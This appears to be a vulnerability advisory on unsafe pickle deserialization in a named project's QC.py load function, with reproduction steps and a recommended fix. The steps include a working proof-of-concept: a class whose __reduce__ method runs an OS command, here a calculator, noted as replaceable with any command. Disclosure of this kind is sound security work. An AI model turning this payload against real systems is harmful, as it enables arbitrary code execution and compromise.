### Key Information Summary #### Vulnerability Description - **Vulnerability Type**: Remote Code Execution (RCE) via unsafe deserialization - **Affected File**: QC.py - **Affected Function**: load_qc_pickl() - **Issue**: The function uses `pickle.load()` to deserialize data without validating or sanitizing the input, allowing attackers to execute arbitrary code by providing a malicious pickle file. #### Impact - **Arbitrary Code Execution** - **Remote System Compromise** if the attacker can control `qc_file` #### Reproduction Steps 1. Clone the repository: `git clone https://github.com/iop-api-uw/basestation3` 2. Navigate to the `basestation3` directory: `cd basestation3` 3. Create a malicious `qc.pkl` file: ```python import pickle import os class Evil: def __reduce__(self): return (os.system, ("gnome-calculator",)) # Replace with any OS command payload = pickle.dumps(Evil()) with open("qc.pkl", "wb") as f: f.write(payload) ``` 4. Create and run `exploit.py`: ```python from QC import load_qc_pickl load_qc_pickl("/root/CW/qc.pkl") ``` 5. Observe the calculator opening, confirming arbitrary command execution. #### Recommended Fix - Avoid using `pickle` to load untrusted data. - If serialization/deserialization is necessary, use secure alternatives such as `json.load()` or a custom binary format with proper validation.